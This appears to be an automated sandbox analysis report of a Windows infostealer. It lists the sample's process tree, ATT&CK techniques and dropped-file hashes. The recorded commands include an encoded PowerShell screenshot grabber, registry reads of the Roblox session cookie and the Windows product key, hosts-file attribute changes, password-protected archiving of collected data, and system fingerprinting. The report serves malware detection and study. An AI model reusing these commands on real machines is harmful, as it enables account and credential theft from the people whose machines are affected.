      PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:772
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4n1w4wr1\4n1w4wr1.cmdline"
        5⤵
        
        PID:5196
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA43F.tmp" "c:\Users\Admin\AppData\Local\Temp\4n1w4wr1\CSCBA49ED94409F4970BE861D783B5D653B.TMP"
        6⤵
        
        PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3296
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5748
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5408
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2212
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5360
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5212
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:920
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI3882\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\lZKKZ.zip" *"
    3⤵
    PID:5032
  - - C:\Users\Admin\AppData\Local\Temp\_MEI3882\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI3882\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\lZKKZ.zip" *
      4⤵
      Executes dropped EXE
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:6112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3404

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4536
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:5712
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {496ea495-63b0-49a8-849f-6bf92f78ff3e} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" gpu
    3⤵
    PID:1792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2392 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4913779-f7e1-4dc4-96d2-bb60f4e0d685} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" socket
    3⤵
    PID:1336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2908 -childID 1 -isForBrowser -prefsHandle 2900 -prefMapHandle 1716 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecfe8ee9-e34b-4baa-8403-7408f66f9c8b} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" tab
    3⤵
    PID:636
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3768 -childID 2 -isForBrowser -prefsHandle 3760 -prefMapHandle 2708 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57e24830-0bf1-4f06-a797-8d2b4e0800c5} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" tab
    3⤵
    PID:3720
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4648 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4908 -prefMapHandle 4904 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba76cac7-c5ee-4de6-b324-095e6cb5a701} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" utility
    3⤵
    - Checks processor information in registry
    PID:3092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 3 -isForBrowser -prefsHandle 4344 -prefMapHandle 5432 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d478628c-9f8d-4de4-898e-ff029e0343be} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" tab
    3⤵
    PID:4408
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5576 -childID 4 -isForBrowser -prefsHandle 5656 -prefMapHandle 5652 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1477e5a3-846e-4374-9257-9ca7947367b9} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" tab
    3⤵
    PID:5896
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5808 -childID 5 -isForBrowser -prefsHandle 5548 -prefMapHandle 5552 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c45dbfa-217d-4350-8b50-442a7a7108e3} 5712 "\\.\pipe\gecko-crash-server-pipe.5712" tab
    3⤵
    PID:4264

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
69c09d629d71f4ac97ba52a0ca47292c

SHA1
db95f786816d34f1b4dc8199565cc09c04252908

SHA256
e3ff913b3153bfa98bfc8f54629ec7ccf9c6dd82da8760bad82b4cd52573b27e

SHA512
cc60ef0da7f3db269bbb476595cf8a1ada29065fe869681de9d080e83de4c924c071694531fb65b935c39b8a7c8a465030f6edd55b252ca020000fa769340574

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9c89d5d8ce8dae90ca01b68ff39b9140

SHA1
e1969639ffd970afae8eb3cb1abe07e39cb91016

SHA256
789c01579c13597fce3f3c1cfc8eb82bde28240497ee81ceb61771417baa3c06

SHA512
6b4652911d7adcb068e3513f0c95d1ca4cbbdbe2aa98f5c3ecd5b9134166a366bd358565443ee2e0bbbd2231426db321f6328efdc7822e6fcd75950f9e1b5323

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\activity-stream.discovery_stream.json

Filesize
19KB

MD5
c3e3c5fc04f03093248c5ba198cf28b0

SHA1
47b4c15d012d8bf8b741988a3d2647b374bd9b79

SHA256
8c50c788c0e3fa7f525e4ca5a8d9665eb938c397cd076d43ca2aaa6ad4af08fa

SHA512
951c130c8ac59f15d925ee041daa514f8e19d9ea7513be528588afa3747d1f4ae31cb6ffce216c261d70bf5b537976565012933e226295335069568002ac7253

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\4n1w4wr1\4n1w4wr1.dll

Filesize
4KB

MD5
62f573981ba5821451d8ee2f3cc2e608

SHA1
cb2ed88c89166b9f95cf7a6e3e623ebeb9d69e5a

SHA256
36bf16dc7a71ec3af1ebf3d5459900b4772f88b6a29bf164ca4e97fe5282293a

SHA512
